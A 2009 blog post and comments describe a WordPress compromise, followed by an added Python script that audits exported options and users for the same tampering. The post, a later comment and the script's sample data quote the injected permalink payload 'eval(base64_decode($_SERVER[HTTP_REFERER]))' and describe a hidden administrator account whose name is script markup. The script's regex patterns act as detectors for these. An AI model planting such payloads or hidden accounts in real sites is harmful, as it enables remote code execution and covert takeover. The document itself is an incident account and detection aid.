Sep 4
Intrusion detected
So after saying recently I didn’t think WordPress was that bad for security holes, I find my links on this blog started showing up with strange strings like /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&% on the end.
Looking in the database I see permalinks had been changed to add that string.
I’ve seen a few users registering for my blog, which I thought was odd as users who register have no special rights. But looking at my list of users I have a new Admin user there. And thanks to some sneaky Javascript for a first name they don’t show up in the list of users.
So I have upgraded my version of WordPress, changed my passwords, deleted the intruder’s user, and changed back the permalinks. Hope this will defeat the attacker.
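An added example, not from the original post, of the kind of audit that would have caught both changes described above: a Python check over exported WordPress option values and user rows that flags PHP eval/base64_decode or ${...} interpolation in the permalink structure, script markup in profile fields, and administrator accounts that are not on an expected list. The option names, the sample rows and the known-admin set are constructed for the example.

```python
import re
from typing import Dict, Iterable, List, Set

# Patterns that have no business in a permalink structure or a user profile field.
SUSPICIOUS = {
    "php_eval": re.compile(r"eval\s*\(\s*base64_decode", re.I),
    "php_interp": re.compile(r"\$\{\s*\$?\w+|\$_(SERVER|GET|POST|REQUEST|COOKIE)", re.I),
    "html_script": re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.I),
}

# Constructed sample data mirroring the incident: a tampered permalink structure
# and a second administrator whose first name is script markup.
SAMPLE_OPTIONS = {
    "permalink_structure": "/%year%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%",
    "siteurl": "http://blog.example",
}
SAMPLE_USERS = [
    {"user_login": "andrew", "role": "administrator", "display_name": "Andrew", "first_name": "Andrew"},
    {"user_login": "wp_cache", "role": "administrator", "display_name": "wp_cache",
     "first_name": "<script>void(0)</script>"},
    {"user_login": "reader1", "role": "subscriber", "display_name": "Reader"},
]

def scan_value(value: str) -> List[str]:
    """Names of every suspicious pattern that matches one field value."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(value)]

def audit_wordpress(options: Dict[str, str], users: Iterable[Dict[str, str]],
                    known_admins: Set[str]) -> List[str]:
    """Audit option values and user rows (as exported from wp_options / wp_users
    plus role and profile meta); return one finding string per problem."""
    findings: List[str] = []
    for name in ("permalink_structure", "siteurl", "home"):
        value = options.get(name, "")
        for hit in scan_value(value):
            findings.append(f"option {name}: {hit}: {value!r}")
    for row in users:
        login = row["user_login"]
        for field in ("user_login", "display_name", "first_name", "last_name", "user_url"):
            for hit in scan_value(row.get(field, "")):
                findings.append(f"user {login}: {field}: {hit}")
        # A privileged account nobody created is a finding even if its fields look clean.
        if row.get("role") == "administrator" and login not in known_admins:
            findings.append(f"user {login}: unexpected administrator")
    return findings

if __name__ == "__main__":
    for line in audit_wordpress(SAMPLE_OPTIONS, SAMPLE_USERS, {"andrew"}):
        print(line)
```

Run it against a mysqldump-derived export on a schedule and alert on any non-empty result; the user list in wp-admin cannot be trusted once profile fields carry script.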
September 6th, 2009 at Sunday, 4:29 pm
WordPress seems to be targeted more and more. It’s a pain in the neck keeping up with upgrades every month or so; if I were starting again I would probably just use the WordPress hosting service.
I don’t know why, but the automatic upgrade plugin stopped working for me several versions ago. Upgrading manually isn’t too bad, I just live in fear of screwing it up and losing data.
My site has never been hacked – I think the secret is to have a really unpopular blog that nobody will bother with.
September 7th, 2009 at Monday, 1:39 pm
I just updated my WordPress too in the weekend after reading on Slashdot about some security issues.
September 9th, 2009 at Wednesday, 9:55 am
I found that intrusion just as I was leaving to go tramping for three days. (Isn’t it always like that.) Am glad to see I haven’t come back to a site full of spam and spyware. I’m not sure that the attack that was being used was working anyway as PHP wasn’t evaluating that “eval(base64_decode($_SERVER[HTTP_REFERER]))” string the way the attacker obviously hoped it would.
To be honest I was relying on yum update to keep my WordPress package up to date, but had missed that the version of Fedora I’m running here (8) has since passed into the unsupported land. So I should really upgrade the OS too, but I’m looking at changing to cheaper hosting as another option.
@Andrew: sandfly.net.nz has a higher Alexa rank 3,293,976 than linuxsoftware.co.nz 4,015,988. I’m sure the spammers would love to deface it.